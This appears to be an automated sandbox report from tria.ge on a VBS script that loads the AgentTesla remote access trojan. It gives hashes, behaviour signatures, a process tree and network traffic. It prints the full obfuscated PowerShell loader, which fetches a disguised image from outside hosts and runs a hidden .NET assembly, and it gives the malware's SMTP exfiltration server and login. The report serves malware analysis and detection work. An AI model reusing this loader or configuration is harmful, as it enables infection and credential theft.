Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
12/02/2024, 01:43 UTC
Static task
static1
Behavioral task
behavioral1
Sample
f4691cad5e54ee1d239725e5d2ae270a3ab1e6ffec22bc5fe93d42756d78861e.vbs
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
f4691cad5e54ee1d239725e5d2ae270a3ab1e6ffec22bc5fe93d42756d78861e.vbs
Resource
win10v2004-20231215-en
General
-
Target
f4691cad5e54ee1d239725e5d2ae270a3ab1e6ffec22bc5fe93d42756d78861e.vbs
-
Size
2KB
-
MD5
2e84ff9971ebc6427d9e916d9dabb727
-
SHA1
2cff9666dad3cf3afbfa379718f31081fb1ed57a
-
SHA256
f4691cad5e54ee1d239725e5d2ae270a3ab1e6ffec22bc5fe93d42756d78861e
-
SHA512
1224ec9e4dfa00fb6c8ccd8cac0d775e883a2228a2cb34ed2b394bd6716f43b964820a69a8cc56f086372740bda283ad5d69a1e5f312b60de97de3106c9da922
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.tvixcs.top - Port:
587 - Username:
bigbox@tvixcs.top - Password:
Alllenjeff4@XX - Email To:
bigdeals@tvixcs.top
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 5 IoCs
flow pid Process 5 4776 WScript.exe 7 4776 WScript.exe 17 2044 powershell.exe 28 2044 powershell.exe 30 2044 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation WScript.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 36 api.ipify.org 37 api.ipify.org 38 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2044 set thread context of 3688 2044 powershell.exe 88 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3200 3688 WerFault.exe 88 -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 7 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 5 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4924 powershell.exe 4924 powershell.exe 2044 powershell.exe 2044 powershell.exe 3688 RegAsm.exe 3688 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4924 powershell.exe Token: SeDebugPrivilege 2044 powershell.exe Token: SeDebugPrivilege 3688 RegAsm.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4776 wrote to memory of 4924 4776 WScript.exe 85 PID 4776 wrote to memory of 4924 4776 WScript.exe 85 PID 4924 wrote to memory of 2044 4924 powershell.exe 87 PID 4924 wrote to memory of 2044 4924 powershell.exe 87 PID 2044 wrote to memory of 3688 2044 powershell.exe 88 PID 2044 wrote to memory of 3688 2044 powershell.exe 88 PID 2044 wrote to memory of 3688 2044 powershell.exe 88 PID 2044 wrote to memory of 3688 2044 powershell.exe 88 PID 2044 wrote to memory of 3688 2044 powershell.exe 88 PID 2044 wrote to memory of 3688 2044 powershell.exe 88 PID 2044 wrote to memory of 3688 2044 powershell.exe 88 PID 2044 wrote to memory of 3688 2044 powershell.exe 88
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4691cad5e54ee1d239725e5d2ae270a3ab1e6ffec22bc5fe93d42756d78861e.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwBNDgTreHDgTreDgTreUwB5DgTreFMDgTreeQBvDgTreFgDgTreVQBIDgTreEYDgTreQgBfDgTreEMDgTreQQDgTrehDgTreD0DgTreeQBlDgTreGsDgTreaDgTreB0DgTreHUDgTreYQDgTremDgTreDcDgTreOQDgTreyDgTreDEDgTreMgDgTrelDgTreDQDgTreMgDgTrewDgTreDEDgTreMwDgTre5DgTreEQDgTreMDgTreBCDgTreDQDgTreRDgTreDgTrezDgTreDYDgTreMDgTreBBDgTreDkDgTrePQBkDgTreGkDgTrecwBlDgTreHIDgTrePwBkDgTreGEDgTrebwBsDgTreG4DgTredwBvDgTreGQDgTreLwBtDgTreG8DgTreYwDgTreuDgTreGUDgTredgBpDgTreGwDgTreLgBlDgTreHYDgTreaQByDgTreGQDgTreZQBuDgTreG8DgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('MpSySyoXUHFB_CA!=yekhtua&79212%420139D0B4D360A9=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado'))} }"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3688 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3688 -s 13445⤵
- Program crash
PID:3200
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3688 -ip 36881⤵PID:3232
Network
-
Remote address:8.8.8.8:53Requestpaste.eeIN AResponsepaste.eeIN A104.21.84.67paste.eeIN A172.67.187.200
-
Remote address:104.21.84.67:80RequestGET /d/QkK2f HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: paste.ee
ResponseHTTP/1.1 301 Moved Permanently
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://paste.ee/d/QkK2f
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F%2BVjWx8Fm6ybeE%2BdeOeaCpIOO8MaWS3N6jN7xtxQuk0M9GllA7Vpnlor%2BAOD07DPoTockmiRHvgY1015yDy1XYGJaiihn3KCX67W5Fx34YlJhQNGi2o2JB3A5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 854124d56f046415-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.84.67:443RequestGET /d/QkK2f HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: paste.ee
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=2592000
strict-transport-security: max-age=63072000
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HHn3z%2FOaSpp5E8Hgih%2Fv6PuYHM9Lm%2BzLetmwLdE88%2Bzgg2WMq7coFy%2BhrGTQz6Wz%2F7hUKa6SoIAlBm9KovP0iyz0MuoKLGbo8gO5VexuGMlYtorxnDD0pKjjYg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 854124d7dc7363f2-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request79.121.231.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request67.84.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request154.239.44.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request180.178.17.96.in-addr.arpaIN PTRResponse180.178.17.96.in-addr.arpaIN PTRa96-17-178-180deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestuploaddeimagens.com.brIN AResponseuploaddeimagens.com.brIN A172.67.215.45uploaddeimagens.com.brIN A104.21.45.138
-
GEThttps://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673powershell.exeRemote address:172.67.215.45:443RequestGET /images/004/731/958/original/new_image.jpg?1707143673 HTTP/1.1
Host: uploaddeimagens.com.br
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 8369614
Connection: keep-alive
Last-Modified: Mon, 05 Feb 2024 14:34:33 GMT
ETag: "65c0f1f9-7fb5ce"
Cache-Control: max-age=2678400
CF-Cache-Status: REVALIDATED
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CdWUfqJ4EiM%2FFl7tYKeB7M5pQJ7%2F0xCaVRRMYrQbhwNQsjfUfBJTsAtvdwKvMu%2BAwbF8DDMby8GosTBhLT%2BPE%2FDPjKsBiib61Dno0rtQW02tbqZXomhAuEKY30dcRnBDD0tmwOi0aZFd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 854124e029e863f7-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request72.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request45.215.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestonedrive.live.comIN AResponseonedrive.live.comIN CNAMEweb.fe.1drv.comweb.fe.1drv.comIN CNAMEodc-web-geo.onedrive.akadns.netodc-web-geo.onedrive.akadns.netIN CNAMEodc-web-brs.onedrive.akadns.netodc-web-brs.onedrive.akadns.netIN CNAMEodwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netodwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netIN CNAMEdual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netIN A13.107.137.11dual-spov-0006.spov-msedge.netIN A13.107.139.11
-
Remote address:8.8.8.8:53Requestonedrive.live.comIN A
-
GEThttps://onedrive.live.com/download?resid=9A063D4B0D931024%21297&authkey=!AC_BFHUXoySySpMpowershell.exeRemote address:13.107.137.11:443RequestGET /download?resid=9A063D4B0D931024%21297&authkey=!AC_BFHUXoySySpM HTTP/1.1
Host: onedrive.live.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://br9l5q.am.files.1drv.com/y4mPuzsTxSOK_JhylUeVJ_mlOcxgk77u4HAtXFcnHFxs5Bwz-ot4ty9jKEgY_gkUnJOJM8obh7uU1ug-Z0IHz_mG69u8cyaI2jlsCi0F8MuXnBLg5Ch8BUkoafN2I2-35RTBy2ODuRXjqdEh-SdHVbjP-prZciNpRUZaPCTtFgFxfEIhDId55coipT8wdfVDtQe8hjbwNIeJCO3jEob6RQ1Sg/bdlz.txt?download&psid=1
Set-Cookie: E=P:tlY3GWwr3Ig=:eUwz5NgJoppbNm0ezBoEOjhFK4+pIw+KPw8ksDX5VeA=:F; domain=.live.com; path=/
Set-Cookie: xid=146f1449-4ea0-4668-b7f1-2a7dca32cc7f&&ODSP-ODWEB-ODCF&76; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Mon, 12-Feb-2024 00:04:05 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Mon, 19-Feb-2024 01:44:06 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 6d4674ff9d-pldzk
X-ODWebServer: eurwesteur910235-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 4CA0A0390E804669837DF570F1E06738 Ref B: LON21EDGE2812 Ref C: 2024-02-12T01:44:05Z
Date: Mon, 12 Feb 2024 01:44:05 GMT
Content-Length: 0
-
Remote address:8.8.8.8:53Requestbr9l5q.am.files.1drv.comIN AResponsebr9l5q.am.files.1drv.comIN CNAMEam-files.fe.1drv.comam-files.fe.1drv.comIN CNAMEodc-am-files-geo.onedrive.akadns.netodc-am-files-geo.onedrive.akadns.netIN CNAMEodc-am-files-brs.onedrive.akadns.netodc-am-files-brs.onedrive.akadns.netIN CNAMEam-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.netam-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.netIN CNAMEl-0003.l-msedge.netl-0003.l-msedge.netIN A13.107.42.12
-
GEThttps://br9l5q.am.files.1drv.com/y4mPuzsTxSOK_JhylUeVJ_mlOcxgk77u4HAtXFcnHFxs5Bwz-ot4ty9jKEgY_gkUnJOJM8obh7uU1ug-Z0IHz_mG69u8cyaI2jlsCi0F8MuXnBLg5Ch8BUkoafN2I2-35RTBy2ODuRXjqdEh-SdHVbjP-prZciNpRUZaPCTtFgFxfEIhDId55coipT8wdfVDtQe8hjbwNIeJCO3jEob6RQ1Sg/bdlz.txt?download&psid=1powershell.exeRemote address:13.107.42.12:443RequestGET /y4mPuzsTxSOK_JhylUeVJ_mlOcxgk77u4HAtXFcnHFxs5Bwz-ot4ty9jKEgY_gkUnJOJM8obh7uU1ug-Z0IHz_mG69u8cyaI2jlsCi0F8MuXnBLg5Ch8BUkoafN2I2-35RTBy2ODuRXjqdEh-SdHVbjP-prZciNpRUZaPCTtFgFxfEIhDId55coipT8wdfVDtQe8hjbwNIeJCO3jEob6RQ1Sg/bdlz.txt?download&psid=1 HTTP/1.1
Host: br9l5q.am.files.1drv.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 333824
